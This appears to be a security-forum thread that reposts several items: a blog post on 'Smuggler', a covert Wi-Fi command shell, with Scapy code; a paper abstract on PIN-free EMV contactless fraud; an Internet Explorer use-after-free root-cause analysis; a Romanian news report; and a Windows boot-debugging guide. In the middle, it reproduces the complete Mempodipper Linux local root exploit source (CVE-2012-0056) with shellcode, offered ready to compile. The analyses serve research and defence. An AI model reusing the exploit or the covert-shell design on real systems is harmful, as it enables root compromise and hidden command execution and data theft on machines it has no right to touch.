Nytro

Smuggler - An interactive 802.11 wireless shell without the need for authentication or association I’ve always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information is sent between stations. Much of this additional information is not all that useful from a security perspective. This additional information that I speak of is known as “Information Elements” (IE), which are contained in 802.11 wireless management frames [1]. The Dot Eleven wiki states, “IEs are a device’s way to transfer descriptive information about itself inside management frames. There are usually several IEs inside each such frame, and each is built of type-length-values mostly defined outside the basic IEEE 802.11 specification.” With regards to IEEE 802.11, these information elements are as follows: (0) SSID, (1) Rates, (2) FHset, (3) DSset, (4) CFset, (5) TIM, (6) IBSSset, (16) challenge, (42) ERPinfo, (46) QoS Capability, (47) ERPinfo, (48) RSNinfo, (50) ESRates, (221) vendor and (68) reserved. I wanted to experiment with these IEs directly. Scapy is a powerful tool that allows such access to this layer via Dot11Elt [2]. Using Scapy I wrote some code to extract the SSID and rates IEs as a proof of concept, the code for this is below. [receiver.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements receiver POC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * def packets(pkt): if pkt.haslayer(Dot11) : if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "" : # if management frame and beacon and SSID is blank print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info)) sniff(iface="mon0", prn = packets) This would extract the “SSID” and the “rates” IEs from all beacon management frames discovered which had a blank SSID. I then put together some code to act as the sender. Note that I am using an additional wireless card on mon1 to send packets. The receiver is using a different wireless card on mon0 to listen out for our packets. [sender.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements sender PoC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * conf.iface="mon1" # second wireless card ssid=sys.argv[1] # takes ssid from the command line rates=sys.argv[2] # takes “rates” from the command line def SendRates(rates): frame=RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/Dot11Beacon(cap="ESS")/ Dot11Elt(ID="SSID",len=len(ssid),info=ssid)/Dot11Elt(ID="Rates",info=rates)/ Dot11Elt(ID="DSset",info="\x03")/Dot11Elt(ID="TIM",info="\x00\x01\x00\x00") sendp(frame, verbose=1) SendRates(rates) # python sender.py “” rateshere The command above will result in a beacon management frame sent into the airwaves with a blank SSID and a “rates” information element of “rateshere”. The receiver will parse the frame and print the rates content out to the screen, in this case “rateshere”. I just utilised an IE in a way not originally intended to pass a message. At this point I did a little digging to determine if I was the first to stumble on this little gem. Turns out yes and no. Chandra, et al. [3] in 2007 explored hacking up the 802.11 protocol in order to broadcast additional information without the need for association. This was in the form of SSID and BSSID concatenation and adding in additional IEs to broadcast “coupons” for advertising purposes. The paper did not, however, discuss modifying using it as a two-way communications channel. Gupta V. and Rohil M.K. [4] in 2013 hacked up the 802.11 protocol to transmit information within the "Length" fields of the IEs. However, again this is only for broadcast purposes. So it seems that I am a little late to the party, however it also appears that I am doing things a little different – I am injecting into the actual IE. Furthermore, the research falls short on being restricted to a one way broadcast. What if I could create a two-way covert communications channel? Furthermore, what could I create without the fuss of association and authentication that is usually required in wireless networks before such communications can begin? What if an attacker could send commands and receive the output on this channel? That would be magic++ and then some. Ladies and gentlemen, I present you Smuggler. I expanded on the proof of concepts already discussed to create a tool called Smuggler. It is a two-way covert communications channel, which consists of an interactive wireless shell without the need for association or authentication, and it works like this: An attacker compromises a machine and starts up a receiver (client.py), much like the proof of concept. The receiver listens to management beacon frames with a blank SSID and, when spotted, extracts the rates IE. The evolution here from the proof of concept (v2.0 if you like…) is that the receiver has the operating system parse the rates IE as a command. The attacker leaves the compromised machine with the receiver running and heads off to grab some lunch. Enter the next act. The attacker comes back the next morning, sitting in the car park with a latte. The attacker uses Smuggler (smuggler.py) to create a management beacon frame (with a blank SSID) and a rates IE with their very own command. Now here comes the clever bit - the receiver parses the command found in the rates IE as already discussed, but wait, it then invokes clientprobe.py to construct management probe requests with the output of the command as the SSID. Smuggler on the attacker’s machine is listening out for these management probe requests and extracts the SSID, hence the output. The information is presented in an attractive looking shell not unlike bash. So, to summarise: Receiver (client.py): If management and beacon frame (AND blank SSID) seen, read rates (attackers_command) IE and send to the OS to parse. Process attackers_command Attacker send commands (smuggler.py): Construct management beacon frame (AND blank SSID) with a custom rates IE. Rates = attackers_command Exfiltration (clientprobe.py): Management frame, probe request, SSID = outputofcommand As a proof of concept the same machine is being used with two wireless cards, however, this would work exactly the same on two computers. The example below shows the attacker issuing the “who” command wirelessly (in the “rates” IE) through the wireless card on mon1 in a management beacon frame. The receiver parses this command and sends the output back wirelessly over another wireless card on mon0 via the SSID of a management frame probe request. What happens “under the hood” within the airwaves is shown below. Another proof of concept for your viewing pleasure. A number of text files which exist on the victim machine: The attacker recreates these commands over the wireless airwaves, all without association or authentication. I am not going to release Smuggler just yet - that is not the objective of this blog post. The objective of this post is that I wanted to share my findings of abusing a protocol in a way not intended and use it for bad things, such as creating this covert two-way communications channel without associating or authenticating. I have also created Anti-Smuggler to demonstrate that it is possible to detect such attacks. However, the proof of concept I have demonstrated is pretty basic in that it does not utilise any form of encryption. You would imagine such convert channels would be reinforced with several layers of security, encryption being just one of them. For the final treat; Anti-Smuggler detecting extraction of credit cards. The regular expressions can be expanded to cover all manner of things – directory listings, extraction of the passwd file, etc. [1] Chapter 4 - 802.11 Management frames - DotEleven [2] scapy: scapy.layers.dot11.Dot11Elt Class Reference - doxygen documentation | Fossies Dox [3] Chandra R., Padhye J., Ravindranath L., Wolman A. “Beacon-Stuffing: Wi-Fi without Associations”, In Proceedings of the Eighth IEEE Workshop Mobile Computing Systems and Applications (Tucson, Arizona, February 26-27, 2007) [4] Gupta G., Rohil M.K., “Bit-Stuffing in 802.11 Beacon Frame: Embedding Non-Standard Custom Information”, International Journal of Computer Applications (0975 – 8887), Volume 63 – No. 2 (February 2013) Posted by Tom Neaves on 03 November 2014 Sursa: Smuggler - An interactive 802.11 wireless shell without the need for authentication or association - SpiderLabs Anterior

Harvesting High Value Foreign Currency Transactions from EMV Contactless Credit Cards without the PIN Martin Emms, Budi Arief, Leo Freitas, Joseph Hannon, Aad van Moorsel School of Computing Science, Newcastle University Newcastle upon Tyne NE1 7RU, United Kingdom {martin.emms, budi.arief, leo.freitas, joseph.hannon, aad.vanmoorsel}@ncl.ac.uk ABSTRACT In this paper we present an attack, which allows fraudulent transactions to be collected from EMV contactless credit and debit cards without the knowledge of the cardholder. The attack exploits a previously unreported vulnerability in EMV protocol, which allows EMV contactless cards to approve unlimited value transactions without the cardholder’s PIN when the transaction is carried out in a foreign currency. For example, we have found that Visa credit cards will approve foreign currency transactions for any amount up to €999,999.99 without the cardholder’s PIN, this side-steps the £20 contactless transaction limit in the UK. This paper outlines our analysis methodology that identified the flaw in the EMV protocol, and presents a scenario in which fraudulent transaction details are transmitted over the Internet to a “rogue merchant” who then uses the transaction data to take money from the victim’s account. In reality, the criminals would choose a value between €100 and €200, which is low enough to be within the victim’s balance and not to raise suspicion, but high enough to make each attack worthwhile. The attack is novel in that it could be operated on a large scale with multiple attackers collecting fraudulent transactions for a central rogue merchant which can be located anywhere in the world where EMV payments are accepted. Download: http://homepages.cs.ncl.ac.uk/budi.arief/home.formal/Papers/CCS2014.pdf

Root Cause Analysis of CVE-2014-1772 – An Internet Explorer Use After Free Vulnerability 11:04 pm (UTC-7) | by Jack Tang (Threats Analyst) We see many kinds of vulnerabilities on a regular basis. These range from user-after-free (UAF) vulnerabilities, to type confusion, to buffer overflows, to cross-site scripting (XSS) attacks. It’s rather interesting to understand the root cause of each of these vulnerability types, so we looked at the root cause of an Internet Explorer vulnerability - CVE-2014-1772. We’d privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035. While this vulnerability was already patched some time ago, it is still a good example of UAF vulnerabilities in general. The code to trigger this vulnerability is below: Figure 1. HTML code to trigger vulnerability Before debugging, several flags must be set to make the job of analysis easier. Run the command gflags.exe /i iexplore.exe +hpa +ust to to enable the page heap (HPA) and user stack trace (UST) flags. This will make finding memory corruption and tracing heap allocation and frees easier. This file can be found in the Windbg installation folder. You can now run windbg, attach Internet Explorer, and use it to access the HTML file. Examining the JavaScript execution flow, when line 18 of the HTML code is executed, the crash happens: Figure 2. Output of crash We can see the EDI register point to a freed memory space, which leads to an access violation. What is the value of the EDI register? Let us look at the code below. Figure 3. Assembly code The above code tells us that the EDI is from the first argument, which is the CTreePos* type. We can assume the EDI is a pointer of CTreePos. Since the CTreePos object is freed, how can we get where the object is freed? Because the UST flag is set, we can use the !heap -p -a edi command in windbg. Figure 4. Call stack The above figure shows us the call stack of the CTreePos object freed. The call stack has a lot of information. We see the function CMarkup::FreeTreePos; this evidence gives us evidence that the freed object is CTreePos object and that this is a use-after-free issue. Since it is a UAF issue, we want to deeply understand the issue. We need to locate where the CTreePos object is created, where the object is freed, and where the freed object is used again. Figure 4 gives us where the object was freed. To find where is used again, we need to examine the crash point. The call stack is as follows: Figure 5. Call stack How do we find the location where the CTreePos object was created? There are many ways. I prefer to run the sample again, and break the object freed point and use the !heap -p -a xxxx command to trace back to where the object is created. The call stack is as follows: Figure 6. Call stack For UAF problems, I prefer to compare the 3 locations (create, free, use again) to find some clues. Figure 7. Call stacks There are 3 columns in Figure 7. They are call stack trace summaries: from left to right, it is when the object is created, freed, and used again. In the above example, the direction of the stack is from the bottom to the top. There is plenty of useful information here. First, we can find the relationship between the 3 parts. Under the yellow line, CDoc::CutCopyMove is the last identical function in the creation call stack trace and the free call stack trace. This means the execution flow creates the CTreePos object and then frees the object in CDoc::CutCopyMove. Under the red line, the execution flow frees the object and then uses it again (and crashes) in CSpliceTreeEngine::InsertSplice. In the second column, we find the execution flow in the CSpliceTreeEngine::InsertSplice function encounters a failure and call the Fire_onerror function. The function will call the JavaScript object’s onerror event. At the event, the execution will call CMarkupPointer::UnEmbed to free the object. Right away, we have four questions. Why does it trigger an onerror event? Why does it create the CTreePos object? Why does it free the CTreePos object? Why does it use the freed object again? Before answering these questions, I want to summarize some background knowledge about how Internet Explorer’s DOM tree implementation. Because IE is not open source, this information is gathered by reverse engineering, so it may not be 100% accurate. One page has a CMarkup object to represent the page’s skeleton or DOM tree. The CMarkup object contain a pointer to the root CElement object. This is the parent class of many concrete element classes. In Figure 1, the Javascript object e_1 and e_2 are the CObjectElement objects which are inherited from CElement. The CElement object has a pointer to a CTreeNode object. The CTreeNode object also has a pointer to a related CElement object. The CTreeNode’s object has a pair of pointer to CTreePos objects. Why is a CTreePos object needed? This is because IE uses a Splay Tree algorithm to manuiplate the DOM tree. In the Splay Tree, the CTreePos object is the node that is involved in the algorithm. The CMarkupPointer object represents a location in the CMarkup object (DOM tree). So the CMarkupPointer object has a pointer to CTreePos to represent its location. CMarkupPointer has several statuses which are related to UAF issues. Embed status: this means CMarkupPointer created CTreePos, which is added to the Splay Tree. Unembed status: this means CMarkupPointer removes the CTreePos from the Splay Tree and frees it. The following graph describes the interactions involving the splay tree. Figure 8. Splay tree graph Going back to our four questions, we can now attempt to answer them. Why does it trigger an onerror event? From Figure 1?s Javascript code, we can see e_2.onerror sets a handler function. At line 22, e_2.swapNode will trigger DOM tree’s changing; this calls the CObjectElement::CreateObject function. This function checks the object’s CLSID. Because e_2’s CLSID is not set, it triggers the onerror event handler. In the handler, at line 22, the Javascipt code r.insertNode(e_2) will change the DOM tree once again and change CObjectElement::CreateObject as well; because e_2 has no CLSID , it will again trigger the onerror event handler once again. The second time the this handler runs, at r.setEnd(document.all[1],0)” , it frees the CTreePos object. Why does it create the CTreePos object? From Figure 6, the CTreePos object is created in calling the CDomRange::InsertNode function. We can map this function to Figure 1?s line 19: r.insertNode(e_2). The CDomRange::InserNode function will insert elements into the DOM tree. The function is called Doc::CutCopyMove to modify the DOM tree and takes several arguments. The first CMarkupPointer type argument is the source start location in CMarkup (DOM tree) . The second CMarkupPointer type argument is the source end location in CMarkup (DOM Tree). The third CMarkupPointer type argument is the target location in CMarkup (DOM Tree). Doc::CutCopyMove will copy or move the source sub DOM tree to the target location in DOM tree. Because of the use of the Splay Tree algorithm (which uses CTreePos as a node), the function needs to create a CTreePos object and add it to the SplayTree for source CMarkup (DOM tree) and target CMarkup (DOM Tree). Doc::CutCopyMove calls CMarkup::DoEmbedPointers to let the CMarkupPointer change to embed status. Finally, the CTreePos object is created. The UAF CTreePos object is created for the e_1 JavaScript element. Why does it free the CTreePos object? From the call stack trace when the CTreePos object is freed (Figure 4), we can find CDomRange::setEnd. This function can be mapped to line 17 in Figure 1: r.setEnd(e_1,0). That means the CTreePos object is in the implementation of setEnd. The CDomRange::setEnd function wants to replace the original end point with a new end point. This function finally calls CMarkupPointer::MoveToPointer to move to the specific DOM tree location. It will first call CMarkupPointer::UnEmbed to change this CMarkupPointer object to unembed and remove CTreePos from the Splay Tree and free it. The JavaScript code r.setEnd‘s argument is the e_1 element. So the CTreePos object related with the e_1 element is freed. Why does it use the freed object again? In Figure 7, under the red line is the function call for CSpliceTreeEngine::InsertSplice. Column B is CSpliceTreeEngine::InsertSplice+0x13ff. Column C is CSpliceTreeEngine::InsertSplice+0x6EDD4A. Column B is the free call stack trace and Column C is the “used again” crash call stack trace. This means that both “free” and “used again” happen in one function called CSpliceTreeEngine::InsertSplice. We trace the execution flow in this function, and find the following: Figure 9. Assembly code Instruction 636898C4, eax is the address of the UAF CTreePos Objects. The function saves the address to a local variable var_1E4. Then, it proceeds to 6368AA9A. Figure 10. Assembly code At 6368AA9A, it calls a virtual function CObjectElement::Notify. We can find here the call stack trace from Figure 7?s column B. This means when running this call, it encounters an error and calls the onerror event handler . That frees the CTreePos object. However, the CSpliceTreeEngine::InsertSplice function local variable var_1E4 holds a reference to this freed object. It then proceeds to 63D7735B. At 63D7735B , it calls CElment::RecordTextChange ForTsf with var_1E4 as the second argument. When this function is run, if any instruction accesses the contents of the CTreePos object, a crash occurs. Summary In brief, the UAF issue’s root cause is that under the event interaction context, CSpliceTreeEngine::InsertSplice doesn’t handle local variable reference validation properly. DOM is based on event mechanisms. Under complex event interaction contexts, it is a significant challenge to solve UAF issue completely. However, in recent patches Microsoft has introduced memory protection in Internet Explorer, which helps mitigate UAF issues (especially in cases where a UAF object is referenced from the call stack). This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better. Trend Micro Deep Security protects users against this particular threat. The following rule, released as part of the regular updates released in June is applicable: 1006036 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-1772) Sursa: Root Cause Analysis of CVE-2014-1772 - An Internet Explorer Use After Free Vulnerability | Security Intelligence Blog | Trend Micro

[h=1]Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2[/h] /*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.cBlog post about it is here: http://blog.zx2c4.com/749 */ /* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time I've put it * in a rather lengthy blog post: http://blog.zx2c4.com/749 * * Enjoy. * * - zx2c4 * Jan 21, 2012 * * CVE-2012-0056 */ #define _LARGEFILE64_SOURCE #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/user.h> #include <sys/ptrace.h> #include <sys/reg.h> #include <fcntl.h> #include <unistd.h> #include <limits.h> char *prog_name; int send_fd(int sock, int fd) { char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; int n; char cms[CMSG_SPACE(sizeof(int))]; buf[0] = 0; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = CMSG_LEN(sizeof(int)); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_len = CMSG_LEN(sizeof(int)); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len) return -1; close(sock); return 0; } int recv_fd(int sock) { int n; int fd; char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; char cms[CMSG_SPACE(sizeof(int))]; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = sizeof cms; if ((n = recvmsg(sock, &msg, 0)) < 0) return -1; if (n == 0) return -1; cmsg = CMSG_FIRSTHDR(&msg); memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); close(sock); return fd; } unsigned long ptrace_address() { int fd[2]; printf("[+] Creating ptrace pipe.\n"); pipe(fd); fcntl(fd[0], F_SETFL, O_NONBLOCK); printf("[+] Forking ptrace child.\n"); int child = fork(); if (child) { close(fd[1]); char buf; printf("[+] Waiting for ptraced child to give output on syscalls.\n"); for ( { wait(NULL); if (read(fd[0], &buf, 1) > 0) break; ptrace(PTRACE_SYSCALL, child, NULL, NULL); } printf("[+] Error message written. Single stepping to find address.\n"); struct user_regs_struct regs; for ( { ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); wait(NULL); ptrace(PTRACE_GETREGS, child, NULL, &regs); #if defined(__i386__) #define instruction_pointer regs.eip #define upper_bound 0xb0000000 #elif defined(__x86_64__) #define instruction_pointer regs.rip #define upper_bound 0x700000000000 #else #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) return instruction_pointer; } } } else { printf("[+] Ptrace_traceme'ing process.\n"); if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) { perror("[-] ptrace"); return 0; } close(fd[0]); dup2(fd[1], 2); execl("/bin/su", "su", "not-a-valid-user", NULL); } return 0; } unsigned long objdump_address() { FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r"); if (!command) { perror("[-] popen"); return 0; } char result[32]; fgets(result, 32, command); pclose(command); return strtoul(result, NULL, 16); } unsigned long find_address() { printf("[+] Ptracing su to find next instruction without reading binary.\n"); unsigned long address = ptrace_address(); if (!address) { printf("[-] Ptrace failed.\n"); printf("[+] Reading su binary with objdump to find exit@plt.\n"); address = objdump_address(); if (address == ULONG_MAX || !address) { printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"); printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); exit(-1); } } printf("[+] Resolved call address to 0x%lx.\n", address); return address; } int su_padding() { printf("[+] Calculating su padding.\n"); FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); if (!command) { perror("[-] popen"); exit(1); } char result[256]; fgets(result, 256, command); pclose(command); return strstr(result, "this-user-does-not-exist") - result; } int child(int sock) { char parent_mem[256]; sprintf(parent_mem, "/proc/%d/mem", getppid()); printf("[+] Opening parent mem %s in child.\n", parent_mem); int fd = open(parent_mem, O_RDWR); if (fd < 0) { perror("[-] open"); return 1; } printf("[+] Sending fd %d to parent.\n", fd); send_fd(sock, fd); return 0; } int parent(unsigned long address) { int sockets[2]; printf("[+] Opening socketpair.\n"); if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) { perror("[-] socketpair"); return 1; } if (fork()) { printf("[+] Waiting for transferred fd in parent.\n"); int fd = recv_fd(sockets[1]); printf("[+] Received fd at %d.\n", fd); if (fd < 0) { perror("[-] recv_fd"); return 1; } printf("[+] Assigning fd %d to stderr.\n", fd); dup2(2, 15); dup2(fd, 2); unsigned long offset = address - su_padding(); printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); #if defined(__i386__) // See shellcode-32.s in this package for the source. char shellcode[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" "\x80"; #elif defined(__x86_64__) // See shellcode-64.s in this package for the source. char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; #else #error "That platform is not supported." #endif printf("[+] Executing su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { char sock[32]; sprintf(sock, "%d", sockets[0]); printf("[+] Executing child from child fork.\n"); execl("/proc/self/exe", prog_name, "-c", sock, NULL); } return 0; } int main(int argc, char **argv) { prog_name = argv[0]; if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') return child(atoi(argv[2])); printf("===============================\n"); printf("= Mempodipper =\n"); printf("= by zx2c4 =\n"); printf("= Jan 21, 2012 =\n"); printf("===============================\n\n"); if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') return parent(strtoul(argv[2], NULL, 16)); else return parent(find_address()); } Sursa: http://www.exploit-db.com/exploits/35161/

Incepe cu asta: Welcome to Linux From Scratch!

Probabil pentru ca uploadezi trojeni.

Cardurile bancare contactless de la VISA, susceptibile la atacuri din cauza unei bre?e de implementare Dorian Prodan - 4 nov 2014 Toate obiectele din jurul nostru vor s? devin? ceva mai „inteligente” ?i s? se ne simplifice via?a, îns? progresul tehnologic ne ofer? uneori ?i surprize nepl?cute. Cel mai recent exemplu afecteaz? cardurile bancare VISA, un grup de cercet?tori din cadrul universit??ii Newcastle din Marea Britanie descoperind o problem? software a sistemului VISA care faciliteaz? furtul banilor de pe cardurile care includ ?i un cip RFID pentru plata contacteless. Implementat ?i la noi în ?ar?, sistemul de plat? payWave de la VISA folose?te un cip RFID cu ajutorul c?ruia posesorul cardului poate valida o tranzac?ie f?r? a mai folosi codul de protec?ie PIN ?i f?r? a mai introduce cardul într-un POS. Deoarece sistemul este gândit pentru pl??ile m?runte f?cute în mod curent ?i nu folose?te autentific?ri manuale suplimentare, VISA ?i b?ncile emitente au stabilit ?i o limit? pentru sumele care pot fi transferate în cadrul unei opera?iuni, îns? acest sistem se pare c? nu func?ioneaz? tot atât de bine pe cât ?i-ar fi dorit institu?iile bancare. Conform lucr?rii publicate de cercet?torii britanici, sistemul VISA poate fi p?c?lit s? valideze tranzac?ii cu o valoare care dep??e?te limita impus? pentru plata contactless atunci când moneda folosit? este alta decât cea curent? folosit? de banca emitent?. Dac? bariera în moneda implicit? func?ioneaz?, utilizarea unei monede str?ine ?i conversia valutar? f?cut? de banc? scurtcircuiteaz? sistemul de protec?ie VISA ?i permite validarea contactless a unor tranzac?ii cu o valoare de cel mult 999.999 de dolari. Cercet?torii afirm? c? aceast? bre?? poate fi speculat? de cei care vor folosi o metod? ingenioas? prin care datele de pe un card bancar contactless pot fi accesate f?r? ?tirea utilizatorului. Acum doi ani, cercet?torii viaForensic au ar?tat c? pe un telefon Android echipat cu cip NFC pot fi instalate aplica?ii speciale care imit? un POS ?i determin? cardul bancar s? încerce s? se autentifice ?i s? semneze o tranzac?ie. Cercet?torii din cadrul universit??ii Newcastle afirm? c?, folosind aceast? metod?, persoanele r?u inten?ionate pot preg?ti un astfel de telefon, pot ini?ia o tranzac?ie ?i pot încerca s? treac? pe lâng? persoanele str?ine în locuri aglomerate în speran?a c? unul dintre cardurile din buzunarele acestora vor trece suficient de aproape de ei pentru a putea valida tranzac?ia. VISA Europe afirm? c? metoda descoperit? de cercet?torii britanici nu reprezint? o problem? real?. Compania afirm? c? efectuarea unor astfel de pl??i frauduloase este extrem de dificil? dincolo de u?ile laboratorului, în lumea real?. Compania nu a oferit înc? o declara?ie referitoare la problema care permite ocolirea limitelor de sum? stabilite pentru tranzac?iile contactless. Sursa: Cardurile bancare contactless de la VISA, susceptibile la atacuri din cauza unei bre?e de implementare

_|_ Pana pe vreo 20 sa avem si timp sa le imprimam.

[h=3]Debugging Early Boot Stages of Windows[/h] Recently, I have spent some time for reverse engineering bootkit. It has been a fun exercise, but I had to struggle for setting up the environment before that as I could not find a page explains these steps. So as a note for me, I wrote down how to build a bootkit debugging environment as well as how to configure Windows in order to attach a debugger at some early uncommon boot stages. [h=3][/h] [h=3]Boot Processes[/h] Here are boot processes of BIOS based Windows XP and Windows 7 systems. I will discuss each stage except for BIOS (POST) and Ntoskrnl.exe. [h=4][/h] [h=4][/h] [h=4]Boot Process (XP)[/h] BIOS (POST) -> MBR -> VBR -> Ntldr (Real-Mode) -> Ntldr (Protected-Mode) -> Ntoskrnl.exe [h=4]Boot Process (Windows 7)[/h] BIOS (POST) -> MBR -> VBR -> Bootmgr (Real-Mode) -> Bootmgr (Protected-Mode) -> Winload.exe -> Ntoskrnl.exe [h=3]Debugging[/h] [h=4]MBR, VBR, Ntldr (Real-Mode) and Bootmgr (Real-Mode)[/h] We need Bochs as no break points are provided on the course of these steps. Installing OS on Bochs is not hard unless you try to find the perfect configurations such as smooth mouse movement, correct clock speed and working NICs. Since we are not going to use this OS anything but boot debugging, I do not encourage you to spend time for it. What you need to do to install OS are roughly as follows: Create a flat hard disk image with 10GB size using bximage.exe. Configure bochs.bxrc with boches.exe to use the created hard disk image and an OS installer ISO image. Start to install OS. Installation may take a few hours. I also strongly recommend you to use the latest version of Bochs to avoid unnecessary troubles. Even if your old IDA Pro does not work with the latest one like my case, you can switch to old one after you completed the installation process for debugging. Here are my bochsrc files for version 2.6.6 and 2.4.6 with nearly identical configurations. You may use them as samples when you are not familiar with Bochs. Once you have finished installing the OS (no need for applying Windows updates), you can debug MBR and VBR with either running it with bochsdbg.exe or corroborating with IDA Pro. If you hope to take the former way, you can add the following settings to enable a GUI debugger. ---- display_library: win32, options="gui_debug" ---- Although the GUI debugger works perfectly fine, it is far better to use IDA Pro if you have. Here is an article about this process by HeyRays, but in a nutshell, you can follow these steps: Download a file mentioned in the article. Copy mbr.py to the same directory as a location of the hard disk image file. Download and copy this batch file to the same directory (you will need to change paths in it). Run the batch file. You will see IDA Pro breaks at the very beginning of MBR (0x7c00) unless there is an error in configurations. Now, you can trace the code and should be able to debug VBR as well. [h=4]Ntldr (Real-Mode) and Bootmgr (Real-Mode)[/h] Although it is totally possible to trace the code until it reaches to Ntldr or Bootmgr, it can be time consuming. One solution is to modify their entry point code with a breakpoint. Luckily, offset 0 of these files are actually entry points, so we can change offset 0 to a breakpoint. Here is an original entry point of Ntldr. Also, as we are using a flat hard disk image file, we can search code pattern of Ntldr or Bootmgr from the image file and change it. In my case, Ntldr was found at offset 0x133D55E00 in the image file. Like the above image, you will probably need to install a magic_break provided by Bochs rather than regular 0xCC since the runtime environment is different from usual, the protected mode. Bochs treats an instruction 'xchg bx, bx' (0x87 0xdb) as a breakpoint when the following statement was added to the bochsrc. ---- magic_break: enabled=1 ---- Once you boot the virtual machine with Bochsdbg.exe, you should see the VM breaks at 0x2:0002. 0x2:0000 is the actual breakpoint which we have set. You can look an IDA to find where to go from here. In my case, the execution need to go to 0x01d8. Then you can change EIP with a 'set $eip = 0x01d8' command and step in with a 's' command to execute a regular code sequence. Note that my Old IDA Pro (v6.0) did not stop when execution reached at a magic_breakpoint, but this issue may have already been solved on the latest version of IDA. [h=4][/h] [h=4]Ntldr (Protected-Mode)[/h] Steps for debugging Ntldr (Protected-mode) is relatively straightforward: Download and extract Ntldr of the checked build version. Open the extracted Ntldr with a hex editor and find an 'MZ' header in it. Copy all contents after that and save it on a debugger system. We assume that you saved it as E:\osloader.exe in this article. This part contains protected mode code of Ntldr. Overwrite existing C:\ntldr with the extracted Ntldr (not osloader.exe). Add the following [debug] section in boot.ini. ---- [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [debug] /debug /debugport=COM1: /baudrate=115200 /debugstop [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional (Debug)" /noexecute=optin /fastdetect /debug /debugport=COM1: /baudrate=115200 ---- Once you reboot the debugee XP system, it waits to be connected by a kernel debugger. In order to load symbols and suppress error messages, you can manually read an osloader.exe image. ---- kd> .readmem E:\osloader.exe 0x400000 L0x1000 Reading 1000 bytes.. kd> .imgscan /l /r 00400000 MZ at 00400000 - size 80000 Name: osloader.EXE Loaded osloader.EXE module ---- Now, you are free to see how Ntoskrnl.exe and boot drivers are initialized. [h=4]Bootmgr (Protected-Mode)[/h] 